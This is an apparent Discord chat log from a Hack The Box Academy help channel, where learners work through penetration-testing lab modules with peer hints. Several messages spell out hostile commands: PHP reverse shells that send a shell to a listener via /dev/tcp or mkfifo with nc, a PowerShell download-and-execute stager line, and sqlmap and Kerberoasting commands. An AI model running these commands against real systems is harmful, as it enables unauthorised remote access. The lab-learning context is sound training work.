#modules

1 messages ยท Page 364 of 1

minor locust
#

Okay sweet

#

Thanks for telling me thats dope there a place for that

fathom pendant
#

@ocean night yall need to make the account link button actually work

minor locust
#

Umm... I have no phone or working phone number ex made sure of it...

fathom pendant
ocean night
fathom pendant
minor locust
#

I am screwed on verification and cool let me try then

ocean night
#

It.. does? If it isn't for some, I'll mention it

fathom pendant
fathom pendant
long kestrel
#

Oh, I thought I had mostly figured it out when changing my source port so that I now see 50000 is open. I have tried using decoy IPs as well but haven't gotten different answers. When trying to use -S to spoof an IP on the same subnet as it, I get errors saying it is unable to reach the host.

fathom pendant
#

But on the account.hackthebox.com site linking the account via that api doesn't work :) (it also didn't work in academy)

ocean night
#

Is it not working for you?

fathom pendant
#

And you need to have control over the ip to spoof as it

ocean night
#

Can raise it internally, just would need something to go on

fathom pendant
ocean night
#

So, for Discord roles?

fathom pendant
#

Ye

ocean night
#

Ah ok, so not the actual li nking of accounts to account.hackthebox

fathom pendant
#

Yeah sorry for the confusion lol

minor locust
#

I love u guys

#

this is great so far

ocean night
#

np, will drop a message in bot channel

minor locust
#

Bet let me link

fathom pendant
#

I can see at some point about making a dummy account and try and link purely from the https://account.hackthebox.com > Security Settings > Discord account

minor locust
#

Bro answered my prayers

fathom pendant
languid fjord
#

Itโ€™s being worked on, though.

minor locust
#

@fathom pendant thank you

languid fjord
minor locust
#

You ahve no clue how helpful that is

ocean night
#

Things doing things is awesome

#

especially when things are things too

fathom pendant
#

Imho not having it there until it's ready would be far better

ocean night
#

Thanks Emma โค๏ธ

fathom pendant
#

Or having a disclaimer that [currently does nothing]

minor locust
#

I did it

#

thanks to you for real @fathom pendant

fathom pendant
minor locust
#

i linked it only

fathom pendant
#

Unless discord hasn't updated yet

minor locust
#

lol i mean linked

fathom pendant
minor locust
#

I am looking at that now

ocean night
#

You sent your token as a message - bot commands - use the /identify command @minor locust

minor locust
#

Your the goat I did lol for some reason i thought it was a click on url to link kind of thing

ocean night
#

Just check #rules too ๐Ÿ™‚

fathom pendant
#

I might get back to sweeping up these easy skill paths ๐Ÿค” might tackle the 8 seas adventurer mission in academy for fun, it includes the ad skill path (which i think is also in the CAPE job path) ๐Ÿค” only one outside all that is the OSINT module

minor locust
#

I am going to speedrun this and codecademy as the main one since I am paying 200 and something yearly

ocean night
#

Don't speedrun

#

Learn

#

You aren't in a race, you should be here to learn

#

You are not in competition with anyone in Academy

#

I'm not saying that to get you to spend more time on the platform. I'm saying it because if you rush through things, and only do the bare minimum, you'll end up coming out the other side with much lower retention of the knowledge you've had to demonstrate through the modules and courses.

fathom pendant
#

Running gets you nowhere fast except tripping over yourself

#

I regret not spending a bit more time in the web modules because in my head they were 'too easy' and it bit me in the ass when I didn't have notes ready

minor locust
#

I want to experience as much of the things out there first before that

#

I'm just a little picky is all

#

I do know a lot already so when I say speedrun that means just going through at a normal pace which is like a week for a whole course and another to practice

ocean night
#

Ok

#

Well

#

Don't rush it

#

Do the modules, sections and exercises

minor locust
#

Yeah I won't rush it like that lol

#

I want to learn and keep the information relevant

fathom pendant
#

VPS not needed either. Proxying is the right track, don't forget about source ports

long kestrel
#

yeah I set it to 53

minor locust
#

That foreheads so white it's shining like the sun

fathom pendant
#

-p is the same as --source-port for netcat

minor locust
#

The ears are huge too lmao

fathom pendant
long kestrel
#

yes

fathom pendant
# long kestrel yes

Have some patience after running the nc command, it can take up to a minute

long kestrel
#

oh i found my issue

fathom pendant
#

Deleting your earlier message bc spoiler

#

And I'm curious as to your issue lol. PEBKAC?

long kestrel
#

i wasnt running it with sudo

minor locust
#

I would like to study and observe from someone here as I work on it all to share information with if similarities exist.

fathom pendant
minor locust
#

bet

dark hedge
#

i'll probably make a pinned post later

dawn tiger
#

hi I am facing difficulty with the blind xpath injection? anyone able to help me to see the error in my code? thank you.

rustic sage
#

TIL you can drop the cheatsheets into Obsidian inline

harsh gorge
rustic sage
drifting trail
#

can someone help me with What is the inode number of the "shadow.bak" file in the "/var/backups" directory? in linux fundamentals

ocean night
#

(in question 2)

drifting trail
#

after running stat -c %i /var/backups/shadow.bak this command it shows /usr/bin/stat: cannot statx '/var/backups/shadow.bak': No such file or directory

ocean night
#

So what's in the /var/backups directory?

#

(there certainly should be a shadow.bak file there)

drifting trail
#

i dont know its showing nothing

ocean night
#

Have you connected to the target?

drifting trail
#

im sorry i didnt get it like what target ....?

#

another target machine or something

ocean night
#

So down where the questions are, just above there should be something like this

drifting trail
#

yes

ocean night
#

You need to click that to spawn the target, then SSH in to it with the provided details. You need to be connected to the VPN as well, either through the Pwnbox, or via OpenVPN (with the config file you can download to the right of that)

#

If you click on "Click here to spawn the target system!", it'll create the target for you to connect to

#

So long as you are connected to the VPN, you will be able to SSH in to the target, and then find the answers for the questions ๐Ÿ™‚

novel matrix
#

The purple team tier 0 for the last assessment on going from zabby to root I wouldn't expect a beginner to know how to priv esc

#

but is a short and nice course

ocean night
#

This is just the Linux Fundamentals module though

#

Sorry, that came across wrong

#

We all start somewhere

drifting trail
#

yes it gave me a target so now what should i do with target

#

im sorry im beginner in it i just started like 2 weeks ago

#

i tried to get help from youtube but it was not much help full

ember dune
#

Module: Document and reporting module lab

Connect to the testing VM using Xfreerdp and practice testing, documentation, and reporting
against the target lab. Once the target spawns, browse to the WriteHat instance on port 443 and
authenticate with the provided admin credentials. Play around with the tool and practice adding findings
to the database to get a feel for the reporting tools available to us. Remember that all data will be lost
once the target resets, so save any practice findings locally! Next, complete the in-progress penetration
test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the
Administrator Desktop on the DC01 host.

i am stuck at this question, can any one help me out!

ocean night
drifting trail
#

no

ember dune
#

I have tried password spraying attack, got smb cred but did not find domain cred,

ocean night
#

Sorry, but I've gotta go. Hope that helps you

fathom pendant
#

sweeping up the skill paths ๐Ÿ’ช https://academy.hackthebox.com/achievement/667914/path/9

dark hedge
#

nice

fathom pendant
#

just missing bash scripting and ASM from the intro ones :)

#

haven't decided if i wanted to the the BOF ones

south glen
#

Hello has any one completed dcsync section from active directory attack and enumeration... I have already through the section just have doubt to clear .. plz reply if anyone finds tym

fathom pendant
#

what's your actual question, if it's not a spoiler

gentle breach
#

Can someone assist me with Bypassing Basic Authentication on web attacks?

#

need to run a curl command to see what http headers the backend accepts, the example they gave me is :

curl -i -X OPTIONS http://SERVER_IP:PORT/

HTTP/1.1 200 OK
Date:
Server: Apache/2.4.41 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: httpd/unix-directory

When I run it it, I dont get the Allow output:
curl -i -X OPTIONS http://94.237.54.116:52101/
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 06:52:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1158
Content-Type: text/html; charset=UTF-8
[8:52 AM]
Any idea of what I can do to show the allow output? maybe a diffrent flag/method?

#

If i run the command on https:example.com? i get the desired result

compact matrix
#

I wasn't getting the options either I jusst gsve up

gentle breach
gentle breach
dire zinc
#

hi, I'm just new to htb although been a certified OSCP can i know how to enable the general channel write access in htb ?

storm elk
civic dawn
#

the reason is, that the web-server is not able to interprete php8-Files as php-Files.. i would try another extension

digital pendant
#

hello! does anyone know if exporting the academy material to have it printed is against any rules? i find a physical book much easier to consume and find it more engaging

#

ah was deleted ๐Ÿ˜›

storm elk
#

yes

digital pendant
#

do you think I should send this to support?

storm elk
#

I think it is best if you ask support

#

Sorry, I thought the "ah was deleted" was on the advertising I deleted

digital pendant
clever topaz
#

anyone has the same problem with Attacking Common Applications - Skills Assessment I? i cant get shell with the CVE.py,
was able to upload nc.exe but cant get shell

clever topaz
#

nvm it worked after restarting pwn box

magic scarab
#

Hi guys,

I am doing the FUNDAMENTALS OF AI module, and I got stuck on the Skills Assesment on the last question:

" What deep learning architecture, known for its ability to process sequential data like text by capturing long-range dependencies between words through self-attention, forms the basis of large language models (LLMs) that can perform tasks such as translation, summarisation, question answering, and creative writing? "

The answer is "Transformer", but it does not accept it.

Any clues?

upbeat zinc
#

write it in plural ๐Ÿ˜‰

turbid crystal
#

Any good laptops for hacking ?

storm elk
#

Hacking depends on the skills mostly

urban elk
#

there's a saying in photography, "the best camera is the one you are carrying"

fathom pendant
#

A poor carpenter blames his tools

#

You can have a 4k 144hz monitor, but if you're dogshit at the game it won't matter

analog dock
#

I like the thinkpad t14 g4 amd 7840u

turbid crystal
#

Okay

dapper moth
#

Still, it will depend on different aspects and your intentionsโ€ฆ will you be running a virtual machine or bare metal? Multiple VMs at the same time or not?
My bare metal Celeron netbook works wonders (just not for hash cracking obviously).
And if you have a decent setup, for learning, you can always use the browser based VM.

upper ruin
#

Linux PrivEsc - Kernel exploits.

#

My brain is currently losing cells ;-;

fallow ginkgo
#

Is there a way I can reset my progress on certain modules and/or paths?

lavish ember
#

can anyone help me on why I can't stabalize me shell?
after I write fg I can't do anything

#

I can't ctrl+C or anything

bright coral
lavish ember
#

It worked thanks alot!

#

Can you tell me why did this happen tho

urban elk
# lavish ember Can you tell me why did this happen tho

When I get a reverse shell, the first thing I typically do it "upgrade it". That means running script or Python to get a TTY, then backgrounding it and running stty raw -echo. Let's figure out what all of that is doing.

Check out some other "Hacking Foundations" videos:

โ–ถ Play video
fathom pendant
lavish ember
#

Thanks guys!<3

silver cloud
#

If anyone struggles to install padbuster for the HTTPS/TLS Attacks module - there is a free burp suite extension that works just as well called "Padding Oracle Hunter"

magic scarab
worldly rivet
#

Im having an issue with the Academy module Pass the Ticket (PtT) from Linux. I'm connected to vpn but the host is unreachable. When I use the browser Parrot VM it can connect just fine, but I'd rather use my local VM that I've been using this whole time

analog dock
worldly rivet
#

I forgot I had reset the machine, hang on

#

same errors

fathom pendant
#

also you only have one vpn running, and aren't running the in-browser pwnbox at the same time?

#

have you also tried changing vpn region and resetting your openvpn connection?

worldly rivet
worldly rivet
fathom pendant
#

turn off the browser pwnbox

#

make sure you sudo killall openvpn before conneceting to the new one

worldly rivet
#

hey it magically started working ๐Ÿ™‚

#

sorry for raising the alarm, I had given up last night from this issue and had the same this morning. on lunch break at work and got frustrated. Thanks for the help!

#

this box is frozen.....

regal sigil
#

Module: Web Attacks
Section: Blind Data Exfiltration
Question: Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.

I have tried to follow the first method exactly as given, but I am not getting the second request after fetching the xxe.dtd file. I cannot spot any mistakes.
I tried the second method with XXEInjector and that worked fine

bright coral
regal sigil
ancient niche
#

Good Afternoon, someone can help me?

dawn abyss
#

guys, Im trying to list available shares of the target machine, why am i getting this error? Connection is โœ…

regal sigil
dawn abyss
#

yes

ancient niche
dim hound
urban elk
dawn abyss
#

i tried both options none worked unfortunately!

dim hound
#

Wich question/module are you doing? @dawn abyss

regal sigil
dawn abyss
upbeat zinc
#

I am a bit stuck on the ADCS Attacks -> skills assessment

#

requested a Cert (with coersion), but it needs approval to be issued from admin

#

on the dev machine, i can connect on SMB but in IPC$ is readable

#

i setup proxychains, but can't make the xfreerdp to work over the SSH tunnel to the dev machine

quiet trout
#

im doing the module on shells in the pentest path and it makes a point of how a bind shell drops you directly into an (interactive) bash session... and i guess the implication being that reverse shells require upgrading?

is this always true:

-bind shells connect to interactive
-reverse shells must always be upgraded to interactive

?

storm charm
#

I am working on the RDP and SOCKS Tunneling with SocksOverRDP in the Pivoting and Tunneling module, I am stuck on connecting to the windows machine with the flag, everytime I try to rdp it allows credential entry and the window pops up but then it closes the connection before the desktop can be displayed. I am getting some errors in the proxifier - " Cannot connect to placeholder (fake) ip address, its reccomended to restart the client application"

tepid hemlock
ancient niche
#

pls

#

i need help

dark hedge
ancient niche
#

the wrappers

#

i can't find it

dark hedge
#

i'm not sure what you mean.. if you can describe what you're trying to do and what the issue is

ancient niche
#

the problem is that i can't find Try to gain RCE using one of the PHP wrappers and read the flag at/

#

BuirSuite not loading i think

dark hedge
#

and what have you tried doing

regal sigil
quiet trout
#

make sure you're converting to base64

#

if im recalling from memory correctly

harsh gorge
#

Did you try reading the cheatsheet

#

odds are your query is on there

tepid hemlock
#

Does completing a skill ass. automatically give you the cubes for everything else in that module? Or do you need to do each section too?

regal sigil
harsh gorge
#

So what was the reasoning behind making session security a multi machine module?

lusty thicket
lusty thicket
tiny maple
#

Hey

safe star
#

Yo

humble mirage
#

Hey everyone! Iโ€™ve been wondering: If I already have a Golden Ticket and an NT hash, why would I need to crack the password hash? Could you help clarify the scenarios where cracking a password hash would be useful, and also when it might not be necessary while attacking Active Directory? Thanks in advance for sharing your insights!

digital sigil
lusty thicket
#

but yeah it might not be necessary in AD

humble mirage
#

Thanks!

atomic coyote
#

Hello all. I am working the last question on the SMTP Section under the Footprinting Module. I am using the appropriate script with nmap. I've used the resource but I believe there is a issue with timing however, I've tried several timiming settings from the script's options not "T0, T1, ect" and my results are right. Any assistance would be appreciated. Thank you.

fathom pendant
#

t0 affects nmap scanning, not script options

atomic coyote
upper ruin
#

Linux Privilege Escalation - Kernel exploit.
I got the proper exploit that was mentioned in the hint, however upon launching it I have a bash shell which is apparently root.

Problem is that I am somehow now allowed. I also noticed that in the exploit itself the shell is launched with the parameters:
"--norc" "--noprofile" (2nd pic)

Do I have to edit the exploit in some way or no?

#

I was able to obtain the flag using a shell from a previous task, but that's not the point. I want to know where to fix the exploit so I do it the way it's supposed to.

fathom pendant
atomic coyote
fathom pendant
#

You'd need to pass in --script-args

dim ridge
atomic coyote
# fathom pendant There's a standalone smtp-user-enum script

Thank you so much! I was able to solve this with stand alone perl script manipulating the "-w" variable. It's odd that the nmap nse script manimuplated the --script-args unpwdb.timelimit method for the same amount of time did not give the same effect. Do you have a thought on why that might be? It would seem like they should have the same effect.

fathom pendant
#

Bothered*

atomic coyote
lime oyster
#

Hi I am stuck in the "password attacks module". I am at the "protected files section" There is only one task
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer. i have logged to the machine using kira password but i can`t find the " id_rsa file "

#

any hint ? i used ||grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"|| but ifound nothing

iron oar
#

In the "Intro to C2 Operations with Sliver" -> "Assumed Breach" module, it utilizes a stager.txt file under the scheduled tasks section but the generation for this file doesn't appear to be shown anywhere (previously only an aspx stager was generated). Am I missing something here?

safe star
iron oar
#

I assume to get stager.txt to execute inside iex(new-object net.webclient).downloadString('http://10.10.14.62:8088/stager.txt') you need to put the byte array in some sort of shellcode loader that was never mentioned in the module

#

Also this wasnt required to complete the section so maybe its just extra credit but idk kinda feels a bit off to not include a basic example loader and compilation steps

gray yacht
safe star
#

i dont think i did that part but im pretty sure the iex just loads it

iron oar
#

I did it didnt seem to be working for me, I can try again in a bit

iron oar
#

which makes sense cause the stagers are always generated as shellcode

thin owl
#

๐Ÿ‘€

undone skiff
#

Hello. For greenhorn machine, when I upload a reverse shell.zip file to greenhorn, it doesn't connect to netcat. Netcat keeps listening. I have tried to use pentestmonkey reverse shell.php and the php code that ippsec showed but no luck.

#

I get no access

thin owl
#

public channels, makes sense

#

it'll probably get a bit wordy if they explain why in a description, probably good for an update to #welcome

#

or if there is an FAQ on their website about how HTB discord operates

worthy heron
#

I am trying to test HTB Box Vintage but encountered difficulties. According to the domain account provided by the author, bloodhound-python cannot be used, always reporting errors such as authentication failure, but windapsearch and ladpsearch can be used normally. Is it really impossible to use bloodhound here? I hope someone can enlighten me, and I sincerely appreciate your help in advance.

worthy heron
#

I don't have access to that place, and I don't know what's causing it

worthy heron
#

ok

cerulean hinge
#

Hello, may I have some help for the web attacks skill assesment ?

I found an IDOR vuln allowing me to access the profile of any user but can't find anything more...

cloud urchin
cerulean hinge
#

Ok thanks I did that but if i found nothing I guess my script has an issue. I will go back to this step

fringe timber
#

I'm doing the Stored XSS portion of the XSS module. I'm testing the payload "<script>alert(window.origin)</script>" in the To-Do list but it is not popping an alert window. anyone had this issue? also getting a error: request validation, anytime i try to start the pwnbox

#

I bet trying again tomorrow would fix it ;p

cloud urchin
fringe timber
#

Wow, I was using the "reset" button like it was a submit button lol

#

such fail. ty

regal shore
#

Might be a dumb question but is it possible to run my own bash to go through modules instead of using theres

cloud urchin
#

you can use your own virtual machine instead of the pwnbox, if that's what you're asking

#

you just need to download and use the vpn file

regal shore
#

oh okay thanks

coral trench
#

hey , i trying to figure out how to know the internal app asked for in injection Attacks Module Exploitation of PDF Generation Vulnerabilities Section , have been trying for 2 hours to know what is it and how to reach it

viral slate
#

Well, it was kind of tricky, but got a lot of fun

fathom pendant
#

Please don't post potential spoilers also always be mindful of what you're looking at.

narrow oriole
#

how to solve this sir? its under basic toolset, ive used every NSE script available but still dont find the right flag

fathom pendant
#

Also always make sure no extra whitespace in front or behind the copy/paste

narrow oriole
narrow oriole
#

but all i did is scanned all the ports

fathom pendant
narrow oriole
fathom pendant
#

Each port is hosting a different service. Don't solely rely on nmap, this one is a bit silly with scripts sometimes

#

But the scripts shown in the section should be helpful

empty trout
#

hey i am wanna know is there any resource to learn win authentication . On HTB its very high level to me .

fathom pendant
#

Unless I'm misunderstanding

#

Might be a lost in translation thing, not sure what you're meaning by "learn Win authentication"

empty trout
#

i mean on yt i dont understand a thing about it and on other websites too

fathom pendant
#

You have NTLM and Kerberos

#

And both are well enough documented

empty trout
#

yeah and how they work

fathom pendant
#

So is LSA and LSASS

#

ยฏ_(ใƒ„)_/ยฏ

#

Just gotta look them up

empty trout
#

i am on password attacks module and there they introduced win authentication . then didnt understant that and went to yt there i found bluehat conference video explain win authentication . and again i didnt get it

#

let me try finding windows basics and maybe i can find somethign in that module

fathom pendant
fathom pendant
#

If so. You're massively overthinking it

empty trout
#

they said in the module its complex

fathom pendant
#

That command flag just tells the process that it will be interacting with a windows machine and encode/wrap communication with the appropriate TLS

fathom pendant
empty trout
#

i am on credential storage

#

its still a intro

empty trout
fathom pendant
empty trout
#

get lost bro you are not a social engineer

fathom pendant
#

This server isn't hacker4hire. Read the #rules skid

empty trout
fathom pendant
#

It really won't

#

At a surface level all I've needed to know was just the credential stuff like NTDS.dit, the SAM/SYSTEM/SECURITY hives, and the LSASS.dmp

#

Alongside ticket shenanigans via mimikatz/rubeus. But the ticket stuff is (again) surface level. You'll learn more about it when you actually need it

#

But you don't need to know the low level details of how they're stored and the encryption mechanisms

empty trout
#

yeah i will take this advice .

fathom pendant
#

As there's already tools that do the hard part for you

#

Unless you actually want to dig deep into it and write your own scripts to decode/decrypt those. But that's far beyond basics

empty trout
#

you are right but i like to study like this . and for the sake of saving time i will skip this

#

๐Ÿ‘

fathom pendant
#

๐Ÿ‘

#

I'm sure books and stuff exist that break it all down

harsh gorge
#

Idk mate Session Fixation sounds like a non issue. Isnโ€™t a session cookie supposed to stay the same and id a session anyway?

empty trout
#

yeah i dug deep into named pipes and IPC by reading LINUX PROGRAMMING INTERFACE . BUT AT LAST THAT KNOWLEDGE IS NOT USEFULL TO ME

harsh gorge
#

Reading ahead will only confuse you more

#

Donโ€™t do that

fathom pendant
empty trout
#

YEAH OTHER THAN BIND SHELL

fathom pendant
#

Sip please release your shift key

harsh gorge
#

Why are you yelling for?

safe star
# empty trout i mean on yt i dont understand a thing about it and on other websites too

The aim of this presentation is understanding the art of user impersonation in Windows systems. This knowledge will be handy when performing lateral movements and other interesting attacks within Windows and Active Directory networks

โ–ถ Play video
fathom pendant
#

Also, your name is cringe Sad_Squidward_Pepe

harsh gorge
fathom pendant
fathom pendant
harsh gorge
empty trout
#

yeah i think so

fathom pendant
#

Their name is giving MrR0b07 vibes

empty trout
#

what about sam sapeol

fathom pendant
#

Who?

turbid lily
#

is Skills Assesment at Introduction to Windows Command Line lab machine down? I cannot get connection to the assesment machine. I checked if this was a problem of my VPN, but if I spawn a machine in any other section within the same module I do get connection to the module task machine ๐Ÿค” weird. I even tried spawning Pwnbox and it does not have connection either

mild holly
#

Hello guys , i wish all is fine . and need a help (this word's from my heart ) i start leran the path of cpts and when i finish the fifth module i repeat again . because i afraid from i miss any thing and their is some points that i didn't understood 100 % . so please give me your advices . and if there is some Suggestions to how to study for cpts ex: videos or ....

real delta
soft reef
#

On Injection Attacks - LDAP Authentication Bypass I dont understand why they provide user login creds?

pine dune
#

Hi guys, currently on the sql map module and having a little trouble with "running sql map on an http request" section. I am stuck on the second question which is case 3. I am a little confused on how to go about doing it (possibly because Im coming back to this after a while and skimmed the text). I tried intercepting the request in burp and saving it as a txt file and running it but no luck

#

this is the page

bright coral
pine dune
#

this is the hint

#

Try to see where the 'id=1' is sent, and specify this location as the injection mark.

#

however Ive already clicked the button for the id being sent and I cant seem to get it back otherwise I would have intercepted with burp

bright coral
#

The request should be in your text file and why don't you try the stuff mentioned in the hint?

pine dune
bright coral
pine dune
bright coral
pine dune
bright coral
pine dune
storm elk
#

Look at the Custom SQLMap requests bit

#

that should sort your problem

pine dune
storm elk
#

its almost correct

#

but not quite

pine dune
#

dont think its a put request?

#

[WARNING] POST parameter 'id' does not seem to be injectable

#

heres what i got after testing sqlmap -u ip --data='id=1' --batch

storm elk
#

You need to look at what is happening

#

did you capture your request with burp?

pine dune
storm elk
#

Look again

pine dune
#

I think it may be cookie instead of "data"

storm elk
#

Continue with that idea

#

and it clearly tells you waht to odo in the page

#

Detect and exploit SQLi vulnerability in Cookie value id=1

#

It tells you to use the cookie, and a cookie can be found where in a request?

pine dune
pine dune
#

or in the storage section on firefox

storm elk
#

Okay, so a small lesson on HTTP requests.

#

Cookies go in the headers. In your section there's an example of cookies

#

the --data puts whatever you put in the body

pine dune
#

in my command?

storm elk
#

yes,
--headers="..."
or
--cookie="..."

pine dune
storm elk
#

Best to put in the URL

pine dune
storm elk
#

take in mind, your -Cookie is wrong

#

its --cookie

#

And, you still need to tell sqlmap that you want to inject the cookie, and not just provide the cookie

pine dune
storm elk
pine dune
#

sqlmap -u http://94.237.51.215:57471/case3.php --cookie="id=1*" --batch

storm elk
#

yes, now read the question again and you got it

pine dune
#

ahh ok found out the backend dbms is mysql

storm elk
#

you're 1 step away from the answer, need to read the question again for the final parameter

pine dune
#

it says the contents of case 3

#

table

storm elk
#

yes

pine dune
#

--table ?

storm elk
#

almost

pine dune
#

--tables ?

storm elk
#

sqlmap -h will tell you which parameter to use

pine dune
#

ahh ok seem to have gotten flag3 there just need to cat it out somehow

storm elk
#

sqlmap -h will tell you how to just get the table you need

pine dune
#

ahh ok ill have a look at that

#

i tried this

storm elk
#

add the --dump

#

and look into -T

pine dune
#

yeah --dump

storm elk
#

I'd just do this -T flag3 --dump

#

not the --tables

pine dune
#

Took out so much time for something like that ๐Ÿ˜ฆ

pine dune
#

me?

cold star
pine dune
cold star
#

Can I Message You?

storm elk
#

sure, dm me @soft reef

analog folio
#

I'm working on the "ATTACKING AUTHENTICATION MECHANISMS" -> "Signature Wrapping Attack" lab and it seems that whether I do the attack manually or try all 8 XSW methods in the Burp Suite SAML Raider extension, I get the error "Invalid SAML Response. Not Authenticated". Can I get some help, please?

gray yacht
shut ice
#

Is PowerView broken on the skills assessment part 1 box? Getting an error "exception calling FindAll". Tried two versions of PowerView, ep is in bypass, script has downloaded correctly and shows imported when running 'get-module'. Look like no PowerView commands are working? This is from a meterpreter session gained from the web shell that's provided.

sweet jewel
#

try get-domain

shut ice
#

I've just got the shell as system though on WEB-WIN01, no results from get-domain

solid quarry
#

do you have clear text credentials?

shut ice
#

No creds

solid quarry
#

what module is that?

shut ice
#

You start with a powershell webshell running as system, so got a meterpreter shell and tried using PowerView

#

AD enum/attacks part 1

solid quarry
#

Will check my notes

#

maybe they changed because my notes I didn't need to get inside web-win01, and you should have atleast svc_sql creds

#

with this cred you can use the -Credential from powershell, most of the times this FindAll is a problem with your logon session

shut ice
#

You use WEB-WIN01 to kerberoast/crack that SQL account, that's question 2

solid quarry
#

I'm gonna be honest with you I didn't even used the windows machine there, only impacket, secretsdump and psexec

#

Oh I think I found where you are, you used this webshell right? /uploads/antak.aspx ?

shut ice
#

You need a domain account though to kerberoast?

#

Yeah yeah that's the one

solid quarry
#

Yes, but what I did was add a new user to the administrators group, secretsdump from impacket to get the machine acc hash and then use impacket getusersspn

#

GetUserSPNs.py INLANEFREIGHT.LOCAL/'WEB-WIN01$' -dc-ip 172.16.6.3 -hashes :<hash> -request -usersfile users.txt

#

But it is strange that if you are running as system you are technically connecting to the domain with the domain computer account so powerview should have no problems with that

shut ice
#

Ahh I see, will go through it that way. Just seems strange, unless it's a double hop issue as I'm going from metepreter session to powershell ? Not sure

#

Thanks! ๐Ÿ‘

solid quarry
#

I will try some time later this module again and if something works I will tell you

gray yacht
shut ice
gray yacht
#

Yeah you'll need a pivot to run it from your attack box.

shut ice
#

It's not even mentioned proxychains yet so strange how I would be expecting to pivot for the first assessment ? I don't think it has anyway

gray yacht
#

I think it assumes you would use powerview.

#

I've done it a few ways for fun and I prefer to setup a pivot and run everything from my VM.

shut ice
#

Box just restarted and PV now works from the meterpreter > shell > powershell and from a direct PS rev shell

dusk bay
#

Good day. I am working on USING CRACKMAPEXEC > Password spraying. When trying to create a user list from NULL authentication using crackmapexec smb 10.129.204.177 -u '' -p '' --users --export $(pwd)/users.txt, I receive an error on the --export. Is there another way to accomplish this? Thanks

sweet jewel
#

what's the error

dusk bay
#

netexec: error: unrecognized arguments: --export /root/userslist.txt

#

It occurs with netexec or crackmapexec.

#

I tries -o and it appears to work. However, I cannot find the file after successful execution.

safe star
#

is that a real flag?

dusk bay
#

No. I am trying to create a user list from enumeration of AD Users using NULL sessions.

fathom pendant
#

after it finishes executing it should tell you where it saved to

analog folio
#

There should be a .cme or .netexec or similar directory in your home. You may be able to find the file there.

dusk bay
#

I tried locating it using 'locate', but nothing returns. I will look into the directories.

ancient niche
#

Good Afternoon

#

someone can help me ?

storm elk
#

Please donโ€™t ask to ask

#

Just post your issues and someone might reply

#

Post what module and section youโ€™re stuck at

spare tendon
#

Hello everyone,

Could someone help me on the Web Attacks module, on the Advanced File Disclosure chapter, I try to reproduce what is explained, I can't do it during my exercise on the quiz.
I try with the CDATA method and with the error based.

Could someone help me?

ancient niche
#

okey sorry

storm elk
#

Some exercises are not 100% the same as what is explained on the page. Sometimes you need to think a bit outside of the box

fathom pendant
spare tendon
storm elk
#

Sorry Iโ€™m not at my computer

spare tendon
#

Ok, no worries.

if anyone else could help me that would be great

quiet trout
#

can someone tell me if theres any functional difference to these two reverse shells?

(outside the exception of /bin/sh and /bin/bash... if the fifo script used /bin/bash would it still work? its the first time im seeing it as its mentioned in the cpts path

<?php system("/bin/bash -c 'bash -i >/dev/tcp/10.10.15.80/4444 0>&1'"); ?>



<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>```
ancient niche
#

where is can i send photo

fathom pendant
quiet trout
#

the named pipe one though, coudl one insert /bin/bash instead of /bin/sh ?

#

or is that a requirement of the pipe?

fathom pendant
#

yes

quiet trout
#

assuming bash exists of course

fathom pendant
#

you can use any shell

quiet trout
#

ok tyvm

fathom pendant
#

as long as it exists ยฏ_(ใƒ„)_/ยฏ

quiet trout
#

the named pipe one... that is more academic? ive never seen anyone use it... its a long ass cmd?

fathom pendant
#

not really 'more academic' not even sure what you mean by that

#

it's just a different way to do something

quiet trout
#

i mean, it seems that its something mentioned for for students information but doesnt seem to be used often in practice

fathom pendant
#

some people prefer the named pipe over the /dev/tcp/ ยฏ_(ใƒ„)_/ยฏ

quiet trout
#

yeah that reminds me... could one do something like (forgive any error here im using the below example as pseudo script as i dont fully understand the mechanics)...

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| /dev/tcp/10.10.15.80/4444 >/tmp/f"); ?>```
#

basically, a variation or combintion of the above two methods

#

to arrive at the same result

fathom pendant
#

it's not a "combination"

#

it's just another way to do something

#

but also it wouldn't quite work that way

#

/dev/tcp/ip/port is a file location moreso than it is an executable

#

like nc

#

so you'd more do > or < redirectors

quiet trout
#

i see

fathom pendant
#

but the best way to figure it out is to spin up a vuln machine and fuck around

#

the labs are isolated so you can't brick anything that a reset can't fix ยฏ_(ใƒ„)_/ยฏ

#

and you can't mess with someone else's machine

shut ice
#
PS C:\windows\system32\inetsrv> $username = "inlanefreight.local\svc_sql" 
PS C:\windows\system32\inetsrv> $password = "Redacted" 
PS C:\windows\system32\inetsrv> $SecPassword = ConvertTo-SecureString $password -AsPlainText -Force 
PS C:\windows\system32\inetsrv> $cred = New-Object System.Management.Automation.PSCredential($username, $SecPassword) 
PS C:\windows\system32\inetsrv> Enter-PSSession -ComputerName MS01 -Credential $cred

When running this I'm expecting a new powershell session but it keeps me at the same prompt. Doesn't show the new session like in the course, any ideas?

ancient niche
#

how can i sent Photo?

fathom pendant
ancient niche
#

how friend

fathom pendant
storm elk
shut ice
# fathom pendant try with single quotes

Exact same, just takes me back to the prompt

PS C:\windows\system32\inetsrv> $username = 'inlanefreight.local\svc_sql' 
PS C:\windows\system32\inetsrv> $password = 'redacted' 
PS C:\windows\system32\inetsrv> $SecPassword = ConvertTo-SecureString $password -AsPlainText -Force 
PS C:\windows\system32\inetsrv> $cred = New-Object System.Management.Automation.PSCredential($username, $SecPassword) 
PS C:\windows\system32\inetsrv> Enter-PSSession -ComputerName 'MS01.inlanefreight.local' -Credential $cred 
PS C:\windows\system32\inetsrv> PS C:\windows\system32\inetsrv> whoami nt authority\system 
PS C:\windows\system32\inetsrv> hostname WEB-WIN01 ย 
rose hull
#

I have a serious question. Suppose, I get a one month subscription where I unlocked all the modules upto tier 2. Then, my subscription ran out. Then the module access are also lost..?

fathom pendant
#

yes

#

you only keep modules you purchased with cubes

rose hull
#

oh... I see. Thanks for the info.

fathom pendant
#

